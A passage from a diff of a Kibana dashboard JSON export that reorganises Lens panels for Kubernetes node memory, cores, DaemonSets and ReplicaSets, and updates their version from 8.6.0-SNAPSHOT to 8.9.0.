"7113c7e7-1af9-4350-b5d2-57abcb60c633", + "xAccessor": "af01f323-afc0-4b55-b453-8da15facfc28", + "yConfig": [ + { + "axisMode": "left", + "color": "#00bfb3", + "forAccessor": 
"830de93b-4051-4716-99e4-83d625a91288" + } + ] + }, + { + "accessors": [ + "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95" + ], + "collapseFn": "sum", + "layerId": "dde29dcf-00ae-4b80-8d9e-ab45c51efba0", + "layerType": "data", + "palette": { + "name": "negative", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "d0fadeee-3c79-443b-bfcb-b70e78d168e9", - "w": 20, - "x": 28, - "y": 4 - }, - "panelIndex": "d0fadeee-3c79-443b-bfcb-b70e78d168e9", - "title": "Cores used vs total cores", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "seriesType": "line", + "splitAccessor": "f64f7970-3f7d-4f2d-88ae-9e008f2e0bc5", + "xAccessor": "c609fc21-331c-4bbe-81c3-ef8251f3cf80", + "yConfig": [ + { + "axisMode": "left", + "color": "#bd271e", + "forAccessor": "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "top", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "xTitle": "", + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-dfd1702f-213e-4fa2-98e3-5106657c62e7", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Cores used vs total cores" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "a91d36c0-f405-4c04-8510-11134bd259f0", + "w": 20, + "x": 8, + "y": 4 + }, + "panelIndex": "a91d36c0-f405-4c04-8510-11134bd259f0", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": 
"indexpattern-datasource-layer-dfd1702f-213e-4fa2-98e3-5106657c62e7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-dff09473-7596-48c7-bbf4-beccee70d845", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "21cde57c-0e69-4e4c-b3e9-659de2778d06", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "dfd1702f-213e-4fa2-98e3-5106657c62e7": { + "columnOrder": [ + "f0953a4e-8498-4b22-a63a-d24e4a069ed3", + "5c33dcdb-21de-4bdc-b564-ba82ed037d11", + "62125b6d-3199-420b-9d3b-46f159e15d7f" + ], + "columns": { + "5c33dcdb-21de-4bdc-b564-ba82ed037d11": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "30s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "62125b6d-3199-420b-9d3b-46f159e15d7f": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.node.status.ready:\"true\" and data_stream.dataset :\"kubernetes.state_node\" " + }, + "isBucketed": false, + "label": "Total Memory", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-dff09473-7596-48c7-bbf4-beccee70d845", - "type": "index-pattern" + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.node.memory.allocatable.bytes" + }, + "f0953a4e-8498-4b22-a63a-d24e4a069ed3": { + "dataType": "string", + "isBucketed": true, + "label": "Top 100000 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": 
{}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "21cde57c-0e69-4e4c-b3e9-659de2778d06", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "dfd1702f-213e-4fa2-98e3-5106657c62e7": { - "columnOrder": [ - "f0953a4e-8498-4b22-a63a-d24e4a069ed3", - "5c33dcdb-21de-4bdc-b564-ba82ed037d11", - "62125b6d-3199-420b-9d3b-46f159e15d7f" - ], - "columns": { - "5c33dcdb-21de-4bdc-b564-ba82ed037d11": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "30s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "62125b6d-3199-420b-9d3b-46f159e15d7f": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.node.status.ready:\"true\" and data_stream.dataset :\"kubernetes.state_node\" " - }, - "isBucketed": false, - "label": "Total Memory", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.node.memory.allocatable.bytes" - }, - "f0953a4e-8498-4b22-a63a-d24e4a069ed3": { - "dataType": "string", - "isBucketed": true, - "label": "Top 100000 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 100000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - } - 
}, - "incompleteColumns": {} - }, - "dff09473-7596-48c7-bbf4-beccee70d845": { - "columnOrder": [ - "6677e92c-5874-49c1-979e-c16c0d3838cd", - "46082fb5-9abc-42a0-8e4d-8a8d40a66ddf", - "307be273-94a6-41ab-b93b-0debde733492" - ], - "columns": { - "307be273-94a6-41ab-b93b-0debde733492": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "data_stream.dataset :\"kubernetes.container\" " - }, - "isBucketed": false, - "label": "Memory Used", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.container.memory.usage.bytes" - }, - "46082fb5-9abc-42a0-8e4d-8a8d40a66ddf": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "30s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "6677e92c-5874-49c1-979e-c16c0d3838cd": { - "dataType": "string", - "isBucketed": true, - "label": "Top 100000 values of kubernetes.container.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 100000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.container.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "21cde57c-0e69-4e4c-b3e9-659de2778d06", - "key": 
"data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.container", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.container", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.container" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.5, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "307be273-94a6-41ab-b93b-0debde733492" - ], - "collapseFn": "sum", - "layerId": "dff09473-7596-48c7-bbf4-beccee70d845", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "area", - "splitAccessor": "6677e92c-5874-49c1-979e-c16c0d3838cd", - "xAccessor": "46082fb5-9abc-42a0-8e4d-8a8d40a66ddf", - "yConfig": [ - { - "axisMode": "left", - "color": "#00bfb3", - "forAccessor": "307be273-94a6-41ab-b93b-0debde733492" - } - ] - }, - { - "accessors": [ - "62125b6d-3199-420b-9d3b-46f159e15d7f" - ], - "collapseFn": "sum", - "layerId": "dfd1702f-213e-4fa2-98e3-5106657c62e7", - "layerType": "data", - "palette": { - "name": "negative", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "f0953a4e-8498-4b22-a63a-d24e4a069ed3", - "xAccessor": "5c33dcdb-21de-4bdc-b564-ba82ed037d11", - "yConfig": [ - { - "axisMode": "left", - "color": "#bd271e", - "forAccessor": "62125b6d-3199-420b-9d3b-46f159e15d7f" - } - ] - } - ], - "legend": { - "isVisible": true, - 
"maxLines": 1, - "position": "top", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "secondaryFields": [], + "size": 100000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + } + }, + "incompleteColumns": {} }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "a91d36c0-f405-4c04-8510-11134bd259f0", - "w": 20, - "x": 8, - "y": 4 - }, - "panelIndex": "a91d36c0-f405-4c04-8510-11134bd259f0", - "title": "Memory used vs total memory", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "attributes": { - "references": [], - "state": { - "adHocDataViews": { - "0fa53a1e-0589-4380-b700-70dd489a33de": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "0fa53a1e-0589-4380-b700-70dd489a33de", - "name": "state-pods-adhoc", - "runtimeFieldMap": { - "failed": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "not_running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "pending": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" - }, - "type": "long" - }, - "running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" - }, - "type": "long" - }, - "succeeded": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") 
{ emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "295ecdc5-f413-4f20-9f77-74927a10d33d": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "295ecdc5-f413-4f20-9f77-74927a10d33d", - "name": "state_daemonset-ad-hoc", - "runtimeFieldMap": { - "not_ready": { - "script": { - "source": "if (doc[\"kubernetes.daemonset.replicas.desired\"].value - doc[\"kubernetes.daemonset.replicas.ready\"].value != 0) {emit(1)}" - }, - "type": "long" - }, - "ready": { - "script": { - "source": "if (doc[\"kubernetes.daemonset.replicas.desired\"].value - doc[\"kubernetes.daemonset.replicas.ready\"].value == 0) {emit(1)}" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", - "name": "daemonsets-ad-hoc", - "runtimeFieldMap": {}, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - } + "dff09473-7596-48c7-bbf4-beccee70d845": { + "columnOrder": [ + "6677e92c-5874-49c1-979e-c16c0d3838cd", + "46082fb5-9abc-42a0-8e4d-8a8d40a66ddf", + "307be273-94a6-41ab-b93b-0debde733492" + ], + "columns": { + "307be273-94a6-41ab-b93b-0debde733492": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset :\"kubernetes.container\" " + }, + "isBucketed": false, + "label": "Memory Used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "datasourceStates": { - "formBased": { - "layers": { - "b7b25285-ced1-481d-999e-1886b3463594": { - "columnOrder": [ - "e36fb66d-f9b0-46d3-aec4-52638d34d308", - "5b89a3a0-f94e-49c2-bc43-fdd4c7671ea5", - "0e2a3f8d-cc26-453d-bed1-b184e48756b2", - 
"05b6d6a0-0ed8-4f14-a3e4-68071b01b03c" - ], - "columns": { - "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "not_ready: *" - }, - "isBucketed": false, - "label": "Not Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "not_ready" - }, - "0e2a3f8d-cc26-453d-bed1-b184e48756b2": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "ready: *" - }, - "isBucketed": false, - "label": "Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "ready" - }, - "5b89a3a0-f94e-49c2-bc43-fdd4c7671ea5": { - "dataType": "string", - "isBucketed": true, - "label": "Filters", - "operationType": "filters", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "" - }, - "label": "Status" - } - ] - }, - "scale": "ordinal" - }, - "e36fb66d-f9b0-46d3-aec4-52638d34d308": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.daemonset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "0e2a3f8d-cc26-453d-bed1-b184e48756b2", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.daemonset.name" - } - }, - "incompleteColumns": {} - } - } - } + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.container.memory.usage.bytes" + }, + "46082fb5-9abc-42a0-8e4d-8a8d40a66ddf": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + 
"params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "30s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "6677e92c-5874-49c1-979e-c16c0d3838cd": { + "dataType": "string", + "isBucketed": true, + "label": "Top 100000 values of kubernetes.container.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "295ecdc5-f413-4f20-9f77-74927a10d33d", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_daemonset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_daemonset" - } - } - } - ], - "internalReferences": [ - { - "id": "295ecdc5-f413-4f20-9f77-74927a10d33d", - "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", - "type": "index-pattern" - } - ], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "0e2a3f8d-cc26-453d-bed1-b184e48756b2", - "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c" - ], - "collapseFn": "sum", - "layerId": "b7b25285-ced1-481d-999e-1886b3463594", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "splitAccessor": "e36fb66d-f9b0-46d3-aec4-52638d34d308", - "xAccessor": "5b89a3a0-f94e-49c2-bc43-fdd4c7671ea5", - "yConfig": [ - { - "color": "#bd271e", - "forAccessor": "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c" - }, - { - "color": 
"#00bfb3", - "forAccessor": "0e2a3f8d-cc26-453d-bed1-b184e48756b2" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "bottom", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 100000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.container.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "21cde57c-0e69-4e4c-b3e9-659de2778d06", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.container", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.container", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.container" + } }, - "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": { - "dynamicActions": { - "events": [] + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.5, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "307be273-94a6-41ab-b93b-0debde733492" + ], + "collapseFn": "sum", + 
"layerId": "dff09473-7596-48c7-bbf4-beccee70d845", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "area", + "splitAccessor": "6677e92c-5874-49c1-979e-c16c0d3838cd", + "xAccessor": "46082fb5-9abc-42a0-8e4d-8a8d40a66ddf", + "yConfig": [ + { + "axisMode": "left", + "color": "#00bfb3", + "forAccessor": "307be273-94a6-41ab-b93b-0debde733492" + } + ] + }, + { + "accessors": [ + "62125b6d-3199-420b-9d3b-46f159e15d7f" + ], + "collapseFn": "sum", + "layerId": "dfd1702f-213e-4fa2-98e3-5106657c62e7", + "layerType": "data", + "palette": { + "name": "negative", + "type": "palette" }, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "a45792c9-1600-4632-bf8e-a0a0984d82d9", - "w": 10, - "x": 28, - "y": 13 - }, - "panelIndex": "a45792c9-1600-4632-bf8e-a0a0984d82d9", - "title": "DaemonSets", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "seriesType": "line", + "splitAccessor": "f0953a4e-8498-4b22-a63a-d24e4a069ed3", + "xAccessor": "5c33dcdb-21de-4bdc-b564-ba82ed037d11", + "yConfig": [ + { + "axisMode": "left", + "color": "#bd271e", + "forAccessor": "62125b6d-3199-420b-9d3b-46f159e15d7f" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "top", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "xTitle": "", + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [], - "state": { - "adHocDataViews": { - "0fa53a1e-0589-4380-b700-70dd489a33de": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "0fa53a1e-0589-4380-b700-70dd489a33de", - "name": "state-pods-adhoc", - "runtimeFieldMap": { - "failed": { - "script": { - "source": "if 
(doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "not_running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "pending": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" - }, - "type": "long" - }, - "running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" - }, - "type": "long" - }, - "succeeded": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "dbfaeb6f-4fff-4043-8bf8-19d5345fd339": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "dbfaeb6f-4fff-4043-8bf8-19d5345fd339", - "name": "state_replicaset_ad-hoc", - "runtimeFieldMap": { - "not_ready": { - "script": { - "source": "def ready = doc['kubernetes.replicaset.replicas.ready'].value;\ndef des = doc['kubernetes.replicaset.replicas.desired'].value;\nemit(des-ready)" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", - "name": "daemonsets-ad-hoc", - "runtimeFieldMap": {}, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - } - }, - "datasourceStates": { - "formBased": { - "layers": { - "b7b25285-ced1-481d-999e-1886b3463594": { - "columnOrder": [ - "fcc76997-5b49-416b-81ba-37d65ea25296", - "446fc0b3-a6c8-4f4d-914b-748d488083a1", - "a51a9822-167b-4b8f-b7a6-3051da30164b", - "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920" - ], - "columns": { - 
"446fc0b3-a6c8-4f4d-914b-748d488083a1": { - "dataType": "string", - "isBucketed": true, - "label": "Filters", - "operationType": "filters", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "" - }, - "label": "Status" - } - ] - }, - "scale": "ordinal" - }, - "a51a9822-167b-4b8f-b7a6-3051da30164b": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.replicaset.replicas.ready: *" - }, - "isBucketed": false, - "label": "Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "kubernetes.replicaset.replicas.ready" - }, - "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "not_ready: *" - }, - "isBucketed": false, - "label": "Not Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "not_ready" - }, - "fcc76997-5b49-416b-81ba-37d65ea25296": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.replicaset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "a51a9822-167b-4b8f-b7a6-3051da30164b", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.replicaset.name" - } - }, - "incompleteColumns": {} - } - } - } - }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Memory used vs total memory" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "a45792c9-1600-4632-bf8e-a0a0984d82d9", + "w": 10, + "x": 
28, + "y": 13 + }, + "panelIndex": "a45792c9-1600-4632-bf8e-a0a0984d82d9", + "embeddableConfig": { + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "0fa53a1e-0589-4380-b700-70dd489a33de": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "0fa53a1e-0589-4380-b700-70dd489a33de", + "name": "state-pods-adhoc", + "runtimeFieldMap": { + "failed": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "not_running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "pending": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" + }, + "type": "long" + }, + "running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" + }, + "type": "long" + }, + "succeeded": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "295ecdc5-f413-4f20-9f77-74927a10d33d": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "295ecdc5-f413-4f20-9f77-74927a10d33d", + "name": "state_daemonset-ad-hoc", + "runtimeFieldMap": { + "not_ready": { + "script": { + "source": "if (doc[\"kubernetes.daemonset.replicas.desired\"].value - doc[\"kubernetes.daemonset.replicas.ready\"].value != 0) {emit(1)}" + }, + "type": "long" + }, + "ready": { + "script": { + "source": "if (doc[\"kubernetes.daemonset.replicas.desired\"].value - doc[\"kubernetes.daemonset.replicas.ready\"].value == 0) {emit(1)}" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + 
"f8fa576a-6f91-4a11-a43d-7f3964869d7d": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", + "name": "daemonsets-ad-hoc", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "b7b25285-ced1-481d-999e-1886b3463594": { + "columnOrder": [ + "e36fb66d-f9b0-46d3-aec4-52638d34d308", + "5b89a3a0-f94e-49c2-bc43-fdd4c7671ea5", + "0e2a3f8d-cc26-453d-bed1-b184e48756b2", + "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c" + ], + "columns": { + "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "not_ready: *" + }, + "isBucketed": false, + "label": "Not Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "not_ready" + }, + "0e2a3f8d-cc26-453d-bed1-b184e48756b2": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "ready: *" + }, + "isBucketed": false, + "label": "Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "ready" + }, + "5b89a3a0-f94e-49c2-bc43-fdd4c7671ea5": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "dbfaeb6f-4fff-4043-8bf8-19d5345fd339", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_replicaset" - }, - "type": "phrase" - }, - 